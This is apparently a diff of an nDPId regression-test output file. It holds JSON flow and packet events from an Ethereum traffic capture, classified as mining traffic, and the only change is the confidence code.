00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1941,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1578508366081,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366081,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGW6LAqAG4DfsOx91mdl9PCwRidy3gf4AQECw5oQAAAQEICiLYmdkTnX6e"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1951,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365828,"flow_last_seen":1578508366083,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366083,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1951,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365828,"flow_last_seen":1578508366083,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366083,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1968,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1578508366117,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366117,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGSnvOvWsjwKgBuHZf3W6FBUsAADkpP6AScSCofQAAAgQFrAQCCApn2sBGItiZ0wEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1969,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1578508366117,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366117,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPoPAqAG4zr1rI91udl8AOSk\/hQVLAYAQECw4DwAAAQEICiLYmfpn2sBG"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1970,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366073,"flow_last_seen":1578508366119,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":407,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366119,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1578508365226,"flow_last_seen":1578508366012,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":539,"flow_tot_l4_payload_len":1302,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365852,"flow_last_seen":1578508366055,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1578508365045,"flow_last_seen":1578508365241,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1578508365153,"flow_last_seen":1578508365387,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":462,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1578508365189,"flow_last_seen":1578508365942,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":2209,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365846,"flow_last_seen":1578508366076,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":1268,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1578508365741,"flow_last_seen":1578508366031,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":1803,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1578508364832,"flow_last_seen":1578508365305,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":413,"flow_tot_l4_payload_len":1122,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365885,"flow_last_seen":1578508366042,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1332,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365295,"flow_last_seen":1578508365885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":435,"flow_tot_l4_payload_len":1172,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364925,"flow_last_seen":1578508364954,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.180.246.169","src_port":30303,"dst_port":30301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364697,"flow_last_seen":1578508364773,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1136,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"54.36.160.211","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508365567,"flow_last_seen":1578508365567,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"106.12.39.168","src_port":30303,"dst_port":30333,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508366073,"flow_last_seen":1578508366119,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":407,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364522,"flow_last_seen":1578508364664,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":1247,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.158.244.151","src_port":56615,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1970,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366073,"flow_last_seen":1578508366119,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":407,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366119,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1578508365226,"flow_last_seen":1578508366012,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":539,"flow_tot_l4_payload_len":1302,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365852,"flow_last_seen":1578508366055,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1578508365045,"flow_last_seen":1578508365241,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1578508365153,"flow_last_seen":1578508365387,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":462,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1578508365189,"flow_last_seen":1578508365942,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":2209,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365846,"flow_last_seen":1578508366076,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":1268,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1578508365741,"flow_last_seen":1578508366031,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":1803,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1578508364832,"flow_last_seen":1578508365305,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":413,"flow_tot_l4_payload_len":1122,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365885,"flow_last_seen":1578508366042,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1332,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365295,"flow_last_seen":1578508365885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":435,"flow_tot_l4_payload_len":1172,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364925,"flow_last_seen":1578508364954,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.180.246.169","src_port":30303,"dst_port":30301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364697,"flow_last_seen":1578508364773,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1136,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"54.36.160.211","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508365567,"flow_last_seen":1578508365567,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"106.12.39.168","src_port":30303,"dst_port":30333,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508366073,"flow_last_seen":1578508366119,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":407,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
